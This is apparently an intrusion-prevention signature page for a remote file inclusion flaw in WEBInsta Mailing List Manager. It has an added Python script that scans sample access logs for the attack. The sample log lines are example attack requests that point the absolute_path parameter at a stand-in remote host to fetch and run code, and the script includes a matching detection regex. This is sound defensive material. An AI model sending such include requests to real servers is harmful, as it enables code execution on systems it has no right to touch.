Intrusion Prevention

WEBInsta.MailListMgr.Remote.File.Inclusion

Description

This indicates a possible exploit of an arbitrary file inclusion vulnerability in the WEBInsta Mailing list manager application.

WEBInsta Mailing list manager is a PHP-based application that provides a centralized mailing list and newsletter system for small to medium-sized web sites. A remote file include vulnerability has been reported in it that may allow an attacker to execute PHP code on the target system with the privileges of the web server process. The inc/initdb.php script does not properly validate the user-supplied input in the absolute_path parameter. An attacker may supply a URL in the absolute_path parameter that refers to a remote web site, causing arbitrary PHP code to be downloaded from that site and executed on the target system. The malicious PHP code may contain shellcode or operating system commands that run on the affected system, allowing the attacker to gain access to the system to the extent of the web server process's privileges. The vulnerability can only be exploited when the register_globals and allow_url_fopen directives are enabled on the system.
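The following is an added detection example, not part of this signature or of the WEBInsta application. It scans constructed Apache-style access log lines and reports requests to inc/initdb.php whose absolute_path parameter carries a remote URL (the inclusion pattern described above); it assumes the application is installed under /mail/ and decodes percent-encoded values so an encoded scheme is still caught.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2005:12:00:01 +0000] "GET /mail/inc/initdb.php?absolute_path=http://203.0.113.99/x HTTP/1.0" 200 512 "-" "-"
198.51.100.7 - - [10/Mar/2005:12:00:02 +0000] "GET /mail/inc/initdb.php?absolute_path=/var/www/mail/ HTTP/1.1" 200 410 "-" "-"
198.51.100.8 - - [10/Mar/2005:12:00:03 +0000] "GET /mail/index.php HTTP/1.1" 200 2048 "-" "-"
203.0.113.6 - - [10/Mar/2005:12:00:04 +0000] "GET /mail/inc/initdb.php?absolute_path=%68ttps%3A%2F%2F203.0.113.99%2Fx HTTP/1.1" 200 512 "-" "-"
"""

# Client IP, timestamp, request line and status code from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)
# A value that starts with a URL scheme (http://, https://, ftp://, ...) is a
# remote include; allow_url_fopen would let PHP fetch and execute it.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_rfi(log_text):
    """One finding per request to inc/initdb.php with a URL in absolute_path."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.lower().endswith("/inc/initdb.php"):
            continue
        # parse_qs percent-decodes, so %68ttps%3A%2F%2F... becomes https://...
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("absolute_path", []):
            if REMOTE_RE.match(value):
                findings.append({"ip": rec["ip"], "time": rec["ts"], "include_url": value})
    return findings


if __name__ == "__main__":
    for f in detect_rfi(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} remote include via absolute_path={f['include_url']}")
```

A local path in absolute_path (second line) is not reported, since this signature covers remote inclusion only.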

Affected Products

WEBInsta Mailing Manager 1.3d and possibly earlier versions

Impact

Compromise of the affected system.

Recommended Actions

Apply the appropriate patch from the vendor or upgrade to a non-vulnerable version if available.

CVE References

CVE-2005-0748